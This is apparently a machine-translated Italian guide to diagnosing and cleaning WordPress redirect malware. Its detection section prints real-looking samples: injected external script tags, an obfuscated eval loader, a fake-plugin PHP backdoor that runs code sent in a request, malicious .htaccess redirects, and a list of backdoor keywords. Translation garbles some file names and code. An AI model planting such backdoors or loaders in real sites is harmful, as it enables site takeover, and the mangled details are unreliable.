Modificare il reindirizzamento di WordPress? Come pulire un sito web?

Stampa · Время на чтение: 27мин · di · Pubblicato · Aggiornato

giocareAscolta questo articolo

WordPress è stato infettato da malware di reindirizzamento. Reindirizzamento dannoso.

Reindirizzamento dannoso di WordPressReindirizzamento dannoso a WordPress. Se il tuo sito Web WordPress o il pannello di amministrazione reindirizza automaticamente a un sito di spam, è probabile che il tuo sito Web sia stato violato e infettato da malware di reindirizzamento. Quindi, cosa puoi fare con un malware di reindirizzamento di WordPress compromesso sul tuo sito? Prima di tutto, conferma se hai un hack scansionando il tuo

È importante ricordare che il tempo è il tuo migliore amico qui. Non perdere tempo a preoccuparti di questo. Ripareremo completamente l'hack e il tuo sito potrà essere ripulito. Ma devi muoverti velocemente.

Ti guiderò attraverso i passaggi per aiutarti a rimuovere i reindirizzamenti dannosi dal tuo sito, correggere il tuo sito e assicurarti che non accada di nuovo. Con molteplici varianti dell'hack di reindirizzamento di WordPress, può essere complicato arrivare alla radice di esso. Questo articolo ti aiuterà a trovare e rimuovere rapidamente il malware passo dopo passo.

Il contenuto dell'articolo:

Cosa significa un reindirizzamento compromesso (reindirizzamento dannoso) in WordPress?

Un reindirizzamento di WordPress compromesso è un reindirizzamento dannoso.
Reindirizzamento compromesso WordPress si verifica quando viene iniettato codice dannoso nel tuo sito Web, che quindi reindirizza automaticamente i tuoi visitatori a un altro sito Web. In genere, il sito Web di destinazione contiene spam, prodotti farmaceutici del mercato grigio o servizi illegali.

Esistono molti tipi di malware, come il malware favicon, che causano questo comportamento, quindi WordPress malware redirect hack è un termine generico che si riferisce al sintomo predominante: reindirizzamenti dannosi.

Questo tipo di hack colpisce milioni di siti Web e provoca perdite orrende ogni giorno. I siti web stanno perdendo entrate, branding e classifiche SEO, per non parlare dello stress della ripresa.

Tuttavia, la cosa peggiore dell'hacking è che continua a peggiorare. Il malware si diffonde attraverso file e cartelle e persino nel database del tuo sito Web, copiandosi e utilizzando il tuo sito Web per infettare altri.

Entrerò nelle conseguenze specifiche di un hack più avanti in questo articolo, ma basti dire che la tua priorità per salvare il tuo sito web è agire immediatamente e non procrastinare.

Come faccio a sapere se il mio sito WordPress viene reindirizzato allo spam?

Prima di risolvere il problema con reindirizzamento di un sito WordPress compromesso, dobbiamo prima stabilire che il tuo sito è stato sicuramente violato. Come con l'infezione, gli hack hanno sintomi. E poi, una volta identificati i sintomi, puoi confermare la diagnosi con alcuni test.

Come affermato in precedenza, i reindirizzamenti automatici sono un segno sicuro di un hack di reindirizzamento di WordPress. I reindirizzamenti di spam possono verificarsi dai risultati di ricerca, su pagine specifiche o anche quando provi ad accedere al tuo sito web. Il problema con i reindirizzamenti è che non sempre avvengono in modo coerente o affidabile.

Ad esempio, se sei andato sul tuo sito ed è stato reindirizzato, potrebbe non accadere la seconda, terza o quarta volta. Gli hacker sono intelligenti e impostano un cookie per assicurarsi che il problema si verifichi solo una volta.

Il risultato è che è facile cadere in un falso senso di sicurezza quando si ha la sensazione che potrebbe essere un incidente. C'è una piccola possibilità che questo possa essere un bug nel codice, ma quando dico "minuscolo" intendo una possibilità infinitesimale.

Controlla i segni di un reindirizzamento compromesso in WordPress

Di norma, gli hack si manifestano in modi diversi. Individualmente, questi potrebbero essere errori del sito web come un vecchio codice di tracciamento, ma se vedi due o più di questi sintomi sul tuo sito web, puoi essere certo che il tuo sito web è stato violato.

  • Il sito WordPress reindirizza a un sito di spam: Un classico sintomo di un hack di reindirizzamento di WordPress. A seconda della variante del malware, il reindirizzamento può avvenire in modi diversi o in punti diversi del tuo sito.
    Reindirizzamenti automatici: il malware reindirizza automaticamente i tuoi visitatori a siti di spam quando qualcuno visita il tuo sito. Questo accade anche se qualcuno visita il tuo sito da Google o Yandex. In genere, verrai reindirizzato anche se provi ad accedere al tuo sito.
    Reindirizzamento del collegamento: Qualcuno fa clic su un collegamento e poi viene reindirizzato a un altro sito web. Ciò è particolarmente intelligente perché i visitatori fanno clic sui collegamenti aspettandosi di essere comunque reindirizzati a un'altra posizione.
    Reindirizzamenti solo per dispositivi mobili: Solo se si accede al tuo sito Web tramite un dispositivo mobile, viene reindirizzato.
  • I risultati di Google mostrano il messaggio "Il sito potrebbe essere stato violato".: quando il tuo sito web viene visualizzato nei risultati di ricerca, viene visualizzato un piccolo messaggio: "Il sito potrebbe essere stato violato" - apparirà proprio sotto il titolo. Questo è il modo in cui Google avvisa i visitatori di un sito potenzialmente compromesso.
  • Lista nera di Google: La più grande bandiera rossa di tutte - letteralmente - la lista nera di Google è un segno sicuro che il tuo sito è stato violato. Anche se i tuoi visitatori utilizzano un motore di ricerca diverso, utilizzano anche la lista nera di Google per contrassegnare i siti compromessi.
  • Divieto del sito in Yandex: anche un segno sicuro di un sito Web compromesso, le posizioni del tuo sito Web appariranno dai risultati di ricerca di Yandex. Forse la pagina principale rimarrà, ma questo non è un dato di fatto.
  • Google Ads contrassegna gli script sul tuo sito web: se provi a fare pubblicità sul tuo sito web, Google Ads eseguirà la scansione del tuo sito web e ti avviserà degli scenari di reindirizzamento nei tuoi post o nelle tue pagine.
  • L'host web ha sospeso il tuo account: i siti Web sospendono i siti Web per diversi motivi e il malware è uno dei principali. Se vedi questo messaggio quando provi ad accedere al tuo sito web, controlla la tua posta per qualche motivo. In alternativa, contatta il loro team di supporto.
  • Le persone si lamentano del tuo sito: La parte terribile degli hack è che gli amministratori dei siti Web sono solitamente gli ultimi a sapere di un hack, a meno che non abbiano installato un buon plug-in di sicurezza. Così tante persone lo scoprono perché i visitatori e gli utenti del sito Web si lamentano del fatto che il sito Web viene reindirizzato allo spam o addirittura riceve posta indesiderata.

Se vedi uno dei sintomi sopra elencati, è una buona idea annotare le informazioni al riguardo. Che browser hai usato? Che dispositivo hai usato? Queste informazioni possono aiutare a identificare il tipo di malware di hacking di WordPress che stai affrontando e quindi eliminarlo più velocemente.

Verifica se il tuo sito è stato infettato da un hack di reindirizzamento

Il passo successivo per scoprire il sintomo è assicurarsi che si tratti davvero di un hack. Il modo più veloce per assicurarsi che il tuo sito web sia suscettibile a reindirizzamenti dannosi è eseguire la scansione del tuo sito web.

1. Scansiona il tuo sito con un plugin di sicurezza

Se non sei ancora sicuro su 100 % che il tuo sito web sia stato violato, utilizza uno scanner online gratuito per confermare. Un caso molto comune è l'accesso al tuo sito Web da un dispositivo mobile, che indica malware nel file .htaccess. O uno che vediamo spesso è un hack di pagina che reindirizza automaticamente. Questo accade quando c'è malware nel database.

Più avanti nell'articolo, esamineremo altre varianti di malware. In questo momento, voglio sottolineare che il malware diretto dirottato da WordPress può trovarsi quasi ovunque sul tuo sito.

Per questo motivo, ogni scanner lo contrassegnerà in modo diverso. Ad esempio, Quttera segnalerà il malware come segue:

Nome della minaccia: Heur AlienFile gen

E WordFence mostrerà un avviso su un intero gruppo di file sconosciuti, come questo:

* File sconosciuto nel core di WordPress: wp-admin/css/colors/blue/php.ini
* File sconosciuto nel core di WordPress: wp-admin/css/colors/coffee/php.ini
* File sconosciuto nel core di WordPress: wp-admin /css/colors/ectoplasm/php.ini

Questi sono buoni segnali che il tuo sito è stato violato perché, come vedremo più avanti, la cartella /wp-admin non dovrebbe contenere altro che i file principali della tua installazione di WordPress.

Detto questo, sfortunatamente non aiuta per la disinstallazione. Esistono diversi problemi importanti con il modo in cui altri plug-in di sicurezza segnalano malware a causa dei loro meccanismi di rilevamento. Ci sono molti falsi positivi, file mancanti e molti altri problemi. Il tuo sito web è importante, quindi scegli saggiamente il tuo plug-in di sicurezza.

2. Eseguire la scansione con uno scanner di sicurezza online

Puoi anche utilizzare uno scanner di sicurezza online come Sucuri SiteCheck per verificare la presenza di malware di reindirizzamento compromesso. Uno scanner di sicurezza online o uno scanner esterno esegue la scansione del codice sulle pagine e sui post alla ricerca di script dannosi.

L'unico problema con uno scanner front-end è che può e scansionerà solo il codice a cui ha accesso. Cioè, fondamentalmente il codice sorgente di pagine e post. Sebbene ci siano molti malware di reindirizzamento compromessi su queste pagine, ci sono alcune opzioni nei file principali. Lo scanner esterno non li mostrerà affatto.

Consiglio di utilizzare uno scanner di sicurezza online come strumento diagnostico di prima linea. Se risulta essere positivo, puoi essere sicuro che sia positivo e lavorare per correggere l'hacking. Se risulta negativo, puoi controllare manualmente i luoghi non scansionati dallo scanner front-end. In questo modo puoi eliminare parte del lavoro manuale.

3. Scansiona manualmente il sito alla ricerca di malware

Se utilizzi un plug-in di sicurezza per cercare malware di reindirizzamento compromessi, puoi saltare completamente questa sezione. Un buon plug-in di sicurezza farà esattamente ciò che suggerisco di seguito, ma molto più veloce e migliore.

Scansionare il tuo sito Web alla ricerca di malware significa essenzialmente cercare codice indesiderato in file e database. Capisco che il "codice spazzatura" sia inutile come rinvio, ma a causa delle opzioni, non c'è una sola riga che puoi trovare rapidamente e annunciare un hack.

Tuttavia, nella sezione successiva, ho elencato alcuni esempi di malware trovati su altri siti web. E nella sezione successiva parleremo dei luoghi tipici in cui viene iniettato il malware, a seconda del comportamento di reindirizzamento osservato.

Che aspetto ha il malware di reindirizzamento di WordPress

Sto esagerando quella riga in questo articolo, ma il malware di reindirizzamento hack di WordPress ha molte opzioni, quindi non c'è un singolo frammento di codice standard a cui puntare, "Cerca questo!"

Tuttavia, posso darti un'idea di come sono alcuni codici maligni:

  • Il codice può trovarsi da qualche parte nell'intestazione della pagina o su tutte le pagine della tabella wp_posts. Ecco alcuni esempi:

 

type='text/javascript' src='//www.dekeine.nl/wp-content/count.php?s=8131599557550&ver=5.7.2' id='hello_newscript5-js'>
 type='text/javascript' src='https://store.don/tkinhoo/ot./tw/m.js?w=085'>
 type='text/javascript' async src='https://db.d/live/rygoo/stra/tegy./com/js.min.js?s=p&'>
 type='text/javascript' src='https://coun/.tr/acks/tatis/icsss/./com/stm?v=l6.0.0'>
 type=text/javascript src='https://des/.coll/ectf/at/rac/ks./com/t.js'>
 src='https://js/donatel/firstly.ga/stat.js?n=ns1' type='text/javascript'>

  • Le tabelle wp_options potrebbero avere URL sconosciuti nel site_url. Ecco alcuni esempi:
stat/traksatiticss dest/colecfattracks gotosecnd ws.stienernando

 

  • Gli script possono anche essere offuscati, il che significa che è necessario eseguirli tramite un deoffuscatore online per estrarre il codice effettivo.

codice offuscato

eval(StringfromCharCode32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,112,111,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116, 39,41,59,10,32,32,32,32,112,111,46,116,121,112,101,32,61,32,39,16,101,120 99,32,61,32,39,104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,118,61,110,52,39,59,10,32,32,32,32,118, 97,114,32,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,115,99,114,105,112,116,39,41,91,48,93,59,10,32,32, 32.32,115,46

E cosa significa in realtà:

(function() var po = document.createElement('script'); po.type = 'text/javascript'; po.src = eloperatss.sat?v=n4'; var s = document.getElementsByTagName('script') [0];s.parentNode.insertBefore(po, s); )();
  • I plug-in falsi possono avere file che assomigliano a questo quando vengono aperti:
<?php /** * Plugin Name: Wp Zzz * Plugin URI: https://wpforms.com * Description: Default WordPress plugin * Author: WPForms * Author URI: https://wpforms.com * Version: 1.6.3.1 * */ function simple_init() { $v = "base".chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; if(isset($_REQUEST['lt']) && md5($_REQUEST['lt']) == $v("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) { $n = "file_put_contents"; $lt = $v($_REQUEST['a']);$n('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);die();}else{@eval($v($lt));}}else{if(isset($_REQUEST['lt'])){echo $v('cGFnZV9ub3RfZm91bmRfNDA0');}} } add_action('init','simple_init'); function my_custom_js() { echo ' '; } add_action( 'admin_head', 'my_custom_js' ); add_action( 'wp_head', 'my_custom_js' );
  • I reindirizzamenti mobili indicano le modifiche al file .htaccess. Il codice seguente reindirizza a https://daily-prize-best /life/?u=y2ykaew&o=2xup89r&m=1&t=mns2.
RewriteEngine su RewriteRule ^.+\.txt$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.htm$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.html$ https:/ /bit.ly/3iZl8mm [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . https://bit.ly/3iZl8mm[L] RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . indice.php[L]

Luoghi in cui cercare malware reindirizzati

WordPress è diviso in due parti principali: file e database. Il problema con il malware di reindirizzamento violato è che può trovarsi ovunque.

Se hai familiarità con la modifica del codice del tuo sito web, puoi trovare il codice di reindirizzamento che ho menzionato nei seguenti punti. Scarica una copia di backup del tuo sito Web, sia file che database, per cercare componenti aggiuntivi sospetti.

Ancora una volta, tieni presente che ci sono opzioni come reindirizzamenti classici, situazionali, specifici del dispositivo o persino raggruppati. Il codice sarà diverso per ciascuno, così come la posizione.

A. File del sito web

  • File principali di WordPressR: A partire dai più semplici, /wp-admin e /wp-includes non dovrebbero essere diversi da una nuova installazione di WordPress. Lo stesso vale per i file index.php, settings.php e load.php. Questi sono i file principali di WordPress e le impostazioni non apportano alcuna modifica ad essi. Confronta con una nuova installazione di WordPress per vedere se ci sono cambiamenti. Il file .htaccess è un caso speciale. Un hack di reindirizzamento mobile verrà quasi sempre visualizzato in questo file. Cerca la regola dell'agente utente che definisce il comportamento specifico del dispositivo e controlla lo script di reindirizzamento.
  • File del tema attivo: Se hai più di un tema installato (che non è consigliabile iniziare), assicurati che solo uno di essi sia attivo. Quindi, esamina i file del tema attivo come header.php, footer.php e functions.php per codice strano. Un buon modo per verificarlo è scaricare installazioni incontaminate dai siti degli sviluppatori e confrontare il codice con quei file. In genere, questi file devono essere in un formato specifico, motivo per cui il codice spazzatura viene visualizzato. Tieni presente che le impostazioni cambieranno anche il codice. Inoltre, se stai utilizzando temi o plug-in annullati, puoi interrompere la diagnostica proprio qui, perché possiamo assicurarti che sei stato violato a causa loro.
  • Plugin falsi sul tuo sito: Sì, è così. Gli hacker mascherano il malware, rendendolo il più legittimo possibile. Vai alla cartella wp-content/plugins e dai un'occhiata. Qualcosa che non hai installato? Alcuni strani duplicati? Qualcuno di loro ha solo uno o due file nelle proprie cartelle?

Ecco alcuni esempi:

/wp-content/plugins/mplugin/mplugin.php /wp-content/plugins/wp-zzz/wp-zzz.php /wp-content/plugins/Plugin/plug.php

Se hai molti plugin installati, può essere difficile controllarli tutti. La regola empirica per individuare i plug-in falsi è che, per convenzione, i nomi dei plug-in legittimi raramente iniziano con una lettera maiuscola e i loro nomi non contengono caratteri speciali diversi dai trattini. Queste non sono regole, ma convenzioni. Quindi non attribuire loro troppa importanza per identificare definitivamente i falsi. Se sospetti che un plug-in sia falso, cercalo su Google e trova la versione originale nel repository di WordPress. Scaricalo da lì e controlla se i file corrispondono.

B. Banca dati

  • tabella wp_posts: Gli script dannosi sono spesso presenti in ogni pagina. Ma, come abbiamo già detto, gli hacker sono molto astuti. Dai un'occhiata a un buon campione di post prima di decidere che un hack non esiste. Un altro modo per controllare il codice delle tue pagine e dei tuoi post è controllare il codice sorgente della pagina utilizzando un browser. Ogni pagina del tuo sito ha un codice HTML leggibile dai browser. Apri il codice sorgente della pagina e controlla l'intestazione, il piè di pagina e tutto ciò che si trova tra i tag di script per cose che sembrano fuori posto.La sezione head contiene informazioni che il browser utilizza per caricare quella pagina, ma non vengono mostrate al visitatore. Gli script di malware sono spesso nascosti qui, quindi vengono caricati prima del resto della pagina.
  • tabella wp_options: controlla l'url del sito. Questo dovrebbe essere l'URL del tuo sito web nei casi 99%. In caso contrario, questo è il tuo hack proprio qui.

Tuttavia, ora non è il momento di provare a rimuovere qualcosa. Devi essere completamente sicuro che gli script Javascript o PHP siano decisamente dannosi. Vuoi sbarazzarti del malware molto rapidamente, ma affrettarti ti porterà a un sito che non funziona.

Altri modi per verificare la presenza di reindirizzamenti di malware

Potresti non vedere tutti i sintomi sopra elencati come amministratore del sito web. Gli hacker escludono abilmente il tuo IP e il tuo account dalla visualizzazione dei risultati di un hack perché vogliono rimanere inosservati il più a lungo possibile.

Inoltre, potresti vedere il sintomo una volta e quindi non essere in grado di ricrearlo. Tutto questo è molto confuso. Esistono molti altri modi per verificare la presenza di sintomi se non li vedi direttamente sul tuo sito web.

  • Controlla Google Search Console: segnaleranno l'infezione da malware nella sezione Problemi di sicurezza.
  • Usa un browser in incognito per accedere al tuo sito webper vedere cosa vede un visitatore abituale
  • Controlla i registri delle attività per attività utente insolite, come l'elevazione dei privilegi utente o la composizione di messaggi.

La sezione successiva tratta esclusivamente della cancellazione. Fai un respiro profondo e bevi una tazza di tè o caffè. Esaminiamo insieme l'intero processo.

Come rimuovere l'infezione da reindirizzamento compromesso di WordPress?

Ora che sappiamo che il tuo sito web sta reindirizzando a un altro sito, devi agire rapidamente. Col passare del tempo, il numero di hack aumenta in modo esponenziale perché il malware si diffonde a più file e cartelle sul tuo sito web. Ciò non solo aumenta i danni, ma rende anche il recupero molto più difficile.

Presumo che tu abbia già scansionato il tuo sito web prima di raggiungere questa sezione. Tuttavia, se non l'hai fatto, la prima cosa da fare è eseguire la scansione del tuo sito web.

Esistono 2 modi principali per rimuovere i reindirizzamenti dannosi dal tuo sito web. Consiglio vivamente di utilizzare il plug-in di sicurezza poiché ho visto in prima persona il danno che gli hacker possono arrecare a un sito web.

1. (RACCOMANDATO) Utilizzare un plug-in di sicurezza per rimuovere il virus di reindirizzamento

I plug-in di sicurezza vengono utilizzati per rimuovere malware difficili da rilevare. Tutto quello che devi fare è installare il plugin sul tuo sito e attendere qualche minuto affinché il tuo sito venga ripristinato.

Se hai utilizzato uno scanner per confermare che il tuo sito web è stato violato, tutto ciò che devi fare è aggiornarlo e riavere il tuo sito.

Esistono diversi motivi per cui si consiglia di utilizzare tali plug-in:

  1. Rimuovi solo malware e lascia intatto il tuo sito;
  2. Trova le backdoor che gli hacker lasciano per la reinfezione e rimuovile;
  3. Firewall integrato per proteggere il tuo sito dal traffico dannoso.

Se non riesci ad accedere a wp-admin

In questo caso, contatta il servizio di rimozione malware di emergenza per assistenza. Un esperto di sicurezza dedicato ripulirà rapidamente il tuo sito Web e si assicurerà che sia nuovamente attivo e funzionante in pochissimo tempo.

2. Rimuovere manualmente il malware di reindirizzamento di WordPress

È possibile rimuovere il malware di reindirizzamento manuale dal tuo sito Web, ma ci sono dei prerequisiti per farlo.

- Innanzitutto, devi sapere come è configurato WordPress. Da come appaiono i file principali alle cartelle e ai file che ogni plugin e tema crea per lavorare. L'eliminazione di un file necessario può causare l'arresto anomalo del tuo sito, quindi il tuo sito non viene solo violato, ma anche disabilitato.

- In secondo luogo, devi essere in grado di distinguere il codice buono da quello cattivo, ad es. malware. Il codice dannoso è camuffato da codice legittimo o offuscato in modo che non possa essere letto. È molto difficile distinguere un codice buono da un codice cattivo, motivo per cui molti scanner soffrono di falsi positivi.

NotaR: Puoi assumere un esperto di WordPress per rimuovere il malware. Tieni presente che gli esperti di sicurezza sono costosi e impiegheranno del tempo per rimuovere un hack.

Inoltre, non garantiscono che non ricadrai. Tuttavia, consiglio comunque questa linea di condotta piuttosto che provare a rimuovere manualmente il malware.

Ok, questi sono gli avvertimenti. Ecco i passaggi per rimuovere il malware di reindirizzamento dal tuo sito web:

1. Esegui il backup del tuo sito

Assicurati di fare un backup prima di fare qualsiasi cosa. Anche se il sito è stato violato, funziona ancora. Quindi, se qualcosa va storto durante il processo di rimozione del malware, hai un backup a cui tornare. Un sito compromesso è difficile da ripulire. Un sito danneggiato è ancora più difficile da ripulire e talvolta impossibile da recuperare.

L'host web può sospendere il tuo sito o addirittura rimuoverlo. Quindi ottenere l'accesso al tuo sito Web anche per grattarlo è un grosso problema. Dovrai contattare il team di supporto dell'host web per accedere al sito sospeso, ma un sito eliminato non può essere eseguito senza un backup.

2. Scarica una versione pulita di WordPress

Scarica nuove installazioni di WordPress così come tutti i plugin e i temi che usi. Le versioni devono corrispondere a ciò che è sul tuo sito.

Dopo averli scaricati, puoi utilizzare i file vuoti per confrontarli con i file del tuo sito web. Puoi utilizzare il diff checker online per trovare le differenze, perché di certo non ti consigliamo di esaminarle manualmente.

In sostanza, si tratta della corrispondenza delle firme, che è ciò che fa la maggior parte degli scanner di sicurezza. Tuttavia, almeno ora sai quali file e cartelle sono necessari per il corretto funzionamento del tuo sito. Non eliminare nulla in questa fase. Devi solo impostare la linea di base per capire quali file sono necessari.

3. Cerca e rimuovi il malware di reindirizzamento

Questa è forse la fase più difficile del processo. Come ho detto, devi essere in grado di distinguere il codice buono da quello cattivo e quindi rimuoverlo o sostituirlo secondo necessità.

Pulisci i file principali di WordPress

È estremamente importante ottenere la stessa versione di WordPress del tuo sito Web, altrimenti potresti riscontrare un arresto anomalo del sito Web. Una volta caricato, usa cPanel o FTP per accedere ai file del tuo sito web e sostituire le seguenti cartelle:

— /wp-admin
/wp-enables

Queste cartelle sono utilizzate da WordPress per eseguire e caricare il tuo sito Web e non sono pensate per archiviare i contenuti degli utenti. Questa era la parte facile. Ora controlla i seguenti file per codice strano:

- indice.php
wp-config.php
wp-settings.php
- wp-load.php
- .htaccess

Inoltre, non dovrebbero esserci script PHP nella cartella /wp-uploads. Mi rendo conto che il "codice strano" è molto vago, ma come abbiamo detto prima, un malware di reindirizzamento di WordPress compromesso ha molte, molte opzioni.

Pertanto, non posso dirti esattamente quale codice vedrai in nessuno di quei file. Se capisci come funziona il codice, puoi fare riferimento all'elenco dei file WordPress per capire cosa fa ognuno e vedere se qualcuno del codice fa qualcosa di diverso. Una volta che sei sicuro di aver trovato questo codice, eliminalo.

Pulisci temi e plugin da malware

Tutti i file e le cartelle associati al tema e al plug-in sono archiviati nella cartella /wp-content. Puoi controllare ciascuno dei file del tuo sito web per vedere dove c'è una differenza nel codice.

Una parola di cautela qui: non tutti i cambiamenti sono negativi. Se hai personalizzato uno qualsiasi dei tuoi plugin o temi, cosa che probabilmente hai, allora ci saranno differenze rispetto a un'installazione pulita. Se non ti dispiace perdere quelle impostazioni, puoi andare avanti e sostituire i file in blocco.

Probabilmente vorrai mantenere il lavoro che hai svolto, quindi inizia a esaminare attentamente ciascuna delle differenze. Se riesci a seguire la logica del codice, puoi capire come i file interagiscono tra loro e con il resto del tuo sito. Questo dovrebbe permetterti di trovare il malware e rimuoverlo.

Se disponi di un numero significativo di temi e plug-in, questo può essere un compito arduo. Ecco alcuni buoni punti di partenza:

  • File del tema attivo
    - header.php
    — footer.php
    — functions.php
  • Plugin vulnerabili
    - Qualcuno è stato hackerato di recente
    - Ce ne sono non aggiornati
  • Plugin falsi
    - Pochi file
    - Duplicati evidenti

Alcuni file dannosi sembrano innocui e spesso imitano nomi di file reali. È qui che le installazioni pulite sono utili, ma contatta anche gli sviluppatori di plug-in e temi per il supporto se non sei del tutto sicuro.

Rimuovi malware dal database di WordPress

Usa phpMyAdmin per caricare il database da ripulire. Quindi controlla le tabelle per contenuti sospetti come URL di spam o parole chiave. Rimuovi attentamente questo contenuto, assicurandoti che sia un codice errato e non un codice corretto modificato.

Controlla in particolare le seguenti tabelle:

— wp_options
— wp_posts

A seconda delle dimensioni del tuo sito web, questo può richiedere molto tempo. Generalmente, se il malware si trova nella tua tabella wp_posts, sarà presente in ogni singolo post. Se hai centinaia di post con molti contenuti, allora è un compito monumentale da ripulire manualmente.

Tuttavia, una volta identificato lo script del malware, puoi utilizzare SQL (o chiedere a qualcuno che capisca SQL) di rimuovere lo script da ogni messaggio. L'avvertenza qui è che non puoi essere sicuro che questo sia l'unico malware sul tavolo.

Inoltre, in particolare con i siti di e-commerce, ricontrolla se stai rimuovendo informazioni importanti sull'utente o sull'ordine.

4. Rimuovi le backdoor

Ora che hai ripulito il tuo sito web dal malware, verifica la presenza di backdoor. Questi sono i punti di ingresso al tuo sito Web che un hacker si lascia alle spalle in modo che possa reinfettare il tuo sito Web se viene scoperto il loro hack originale.

Le backdoor possono trovarsi in diversi punti. Un po' di codice da cercare:

  • grade
  • base64_decode
  • gzinflate
  • preg_replace
  • str_rot13

Un avvertimento: non sono necessariamente tutti cattivi. Questi sono script PHP legittimi che possono essere leggermente modificati per fungere da backdoor. Fai attenzione a rimuoverli senza un'analisi adeguata.

5. Ricaricare i file puliti

Ora che hai rimosso l'hack, devi rimettere insieme il tuo sito. Usa un file manager per ricaricare i file e phpMyAdmin su cPanel o VestaCP per sostituire il tuo sito web.

Questo è molto simile al modo in cui ripristini manualmente un backup e significa che devi prima eliminare i file e il database esistenti. Se hai accidentalmente saltato il passaggio di backup all'inizio, fallo ora. Il backup del tuo sito Web, anche di uno compromesso, ti farà risparmiare problemi se qualcosa va storto.

6. Svuota la cache del sito

Ora che il tuo sito web ripulito è stato caricato, svuota la cache. La cache memorizza le versioni precedenti delle tue pagine e dei tuoi contenuti e le mostra ai visitatori del tuo sito. Affinché il tuo sito appena pulito si comporti come previsto, devi svuotare la cache.

7. Controlla ciascuno dei plugin e dei temi

Il fatto triste del malware è che può nascondersi quasi ovunque. Dal momento che hai speso tutto quel tempo ed energia per pulire manualmente il tuo sito web, vale la pena dedicare qualche minuto in più per assicurarti che i tuoi sforzi abbiano successo.

Ti consiglio di utilizzare FTP per questo in quanto richiederà molto lavoro per modificare i file del sito web.

  • Disabilita tutti i tuoi plugin e temi rinominando la cartella wp_contents in qualcos'altro.
  • Quindi attivali uno per uno, controllando ogni volta il tuo sito per un reindirizzamento.
  • Se non ci sono problemi, sappi che i plugin e i temi non contengono malware.

Perché sconsiglio vivamente di rimuovere manualmente i reindirizzamenti degli hacker

Potresti chiederti perché non consiglio di eliminare gli hack in questo modo. Pensa agli hack nello stesso modo in cui penseresti a una malattia, come il cancro o un osso rotto.

Preferiresti lasciare la cura di queste malattie a medici che sono professionisti qualificati con una vasta esperienza nel trattarle. Le persone non addestrate fanno più male che bene. Chiedi a qualsiasi medico che abbia avuto a che fare con una frattura ossea mal rimarginata.

Ci sono alcune cose che possono andare storte quando si rimuove manualmente un hack:

  • Il software dannoso può diffondersi in luoghi inaspettati ed è difficile da rimuovere senza errori.
  • La sola rimozione del malware non è sufficiente se le vulnerabilità e/o le backdoor non vengono risolte.
  • L'eliminazione inetta a volte può interrompere altre parti del sito web.
  • I siti di grandi dimensioni (ad esempio i negozi di e-commerce) saranno molto difficili e richiederanno molto tempo per essere esaminati manualmente.
  • Il tempo è essenziale poiché gli hack peggiorano in modo esponenziale nel tempo.
  • Potrebbe non essere possibile accedere al tuo sito Web se l'host ha vietato il tuo account

In poche parole, c'è un enorme margine di errore in un sito Web compromesso. C'è un pericolo molto reale di uscire da questo processo in una posizione peggiore di quella che hai iniziato. È meglio utilizzare un buon plug-in di sicurezza per rimuovere gli script degli hacker.

Il sito Web viene reindirizzato allo spam: in che modo ciò ha influito sul mio sito Web?

I siti Web sono miscele complesse di software e, in sostanza, nessun software è hackerabile sul 100%. Questa è la realtà di qualsiasi software, dai giochi a 8 bit di una volta agli enormi sistemi informativi gestionali utilizzati dalle banche.

I siti Web WordPress non sono diversi. Mentre i file core di WordPress sono i più vicini ad essere a prova di proiettile, lo stesso non si può dire per plugin e temi. Plugin e temi aggiungono elementi dinamici, funzionalità e design ai siti Web e un sito senza di essi sarebbe sicuro, ma anche statico e noioso.

Ecco un elenco dei motivi per cui i siti WordPress vengono violati:

  1. Vulnerabilità in plugin e temi;
  2. Password errate e account utente compromessi;
  3. Backdoor in temi e plugin annullati;
  4. attacchi di script XSS;
  5. Attacchi di forza bruta con i robot.

Come affermato in precedenza, la sicurezza del sito Web non deve essere presa alla leggera. Ora hai un'esperienza diretta di quanto sia difficile riparare un hack, quindi idealmente dovresti avere una strategia in atto per assicurarti che non accada di nuovo.

Come prevenire gli hack di WordPress Redirect in futuro?

Ora che hai un sito Web pulito, i passaggi successivi sono impedire che il tuo sito Web WordPress venga reindirizzato allo spam.

Gli hack si ripetono continuamente. Ciò è dovuto principalmente al fatto che il motivo per cui il tuo sito è stato violato non è stato risolto. Per prevenire il ripetersi, è necessario adottare le seguenti misure:

1. Installa il plug-in di sicurezza: scegli un buon plug-in di sicurezza in grado di scansionare, pulire e prevenire gli attacchi. Questi plug-in dispongono di un firewall integrato che impedisce in modo proattivo al traffico dannoso di raggiungere il tuo sito.
2. Cambia tutte le password per utenti e database: Gli account utente compromessi e le password facilmente indovinabili sono la seconda ragione degli attacchi ai siti web.
3. Reimposta e controlla gli account utente: controlla gli account utente con accesso amministratore non necessario e rimuovili.
4. Cambia ruoli + Chiavi di sicurezza: i ruoli e le chiavi di sicurezza sono lunghe stringhe che WordPress allega ai dati di accesso dei cookie per aiutare gli utenti a rimanere connessi in modo sicuro. Puoi modificarli nel tuo file wp-config.php dopo aver utilizzato il generatore di WordPress per ottenerne di nuovi.
5. Assicurati di utilizzare solo plugin e temi collaudati: L'ho già detto prima, ma vale la pena ripeterlo. Usa solo plugin e temi di sviluppatori fidati. Questi sviluppatori forniranno supporto e aggiornamenti incredibilmente importanti per la sicurezza. In nessun caso dovresti usare temi e plugin vuoti. Qualunque cosa salvi, perderai molte volte a causa dell'inevitabile hack.
